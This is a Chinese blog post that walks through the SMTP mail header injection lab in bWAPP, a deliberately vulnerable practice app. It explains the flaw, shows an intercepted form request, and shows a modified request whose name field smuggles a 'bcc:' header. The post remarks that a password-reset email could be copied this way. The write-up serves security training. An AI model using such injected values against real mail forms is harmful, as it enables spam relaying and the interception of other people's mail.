【bWAPP】Mail Header Injection(SMTP)

 

Mail Header Injection(SMTP)

什么是电子邮件标题注入

通常的做法是网站实施联系表单,反过来将合法用户的电子邮件发送给消息的预期收件人。大多数情况下,这样的联系表单将设置SMTP标头FromReply-to以便让收件人轻松处理联系表单中的通信,就像其他电子邮件一样。

不幸的是,除非用户的输入在插入SMTP头之前被验证,否则联系表单可能容易受到电子邮件头插入(也称为SMTP头注入)的攻击。这是因为攻击者可以将额外的头部注入到消息中,从而指示SMTP服务器执行与预期不同的指令。

以下PHP代码是一种易受电子邮件头部注入攻击的典型联系人表单的示例。以下代码将由网站访问者提供的名称和电子邮件地址,并准备电子邮件的标题列表。

使用From标题,以便电子邮件的收件人(在本示例中为root @ localhost)将知道电子邮件作者是谁。回复标题允许电子邮件的收件人通过他们的电子邮件客户端中的回复按钮回复发送电子邮件的人。

 

比如,邮箱找回密码可以将一份邮件抄送到你的邮箱

 

流程

1、攻击位置

2、截获请求

 

POST /bWAPP/maili.php HTTP/1.1
Host: 192.168.23.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.23.133/bWAPP/maili.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: security_level=0; PHPSESSID=63bcdf8451bac20216cee5c00e933ae4
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

name=wagn&email=bwapp%40mailinator.com&remarks=144&form=submit

 

3、修改请求

POST /bWAPP/maili.php HTTP/1.1
Host: 192.168.23.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.23.133/bWAPP/maili.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Cookie: security_level=0; PHPSESSID=63bcdf8451bac20216cee5c00e933ae4
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

name=wagn \nbcc:io098093oiscx0123@mailinator.com&email=bwapp%40mailinator.com&remarks=144&form=submit

 

 

 

参考链接:https://www.cnblogs.com/hongren/p/7154814.html

 

posted @ 2018-04-27 16:32  rcarry  阅读(1366)  评论(0)    收藏  举报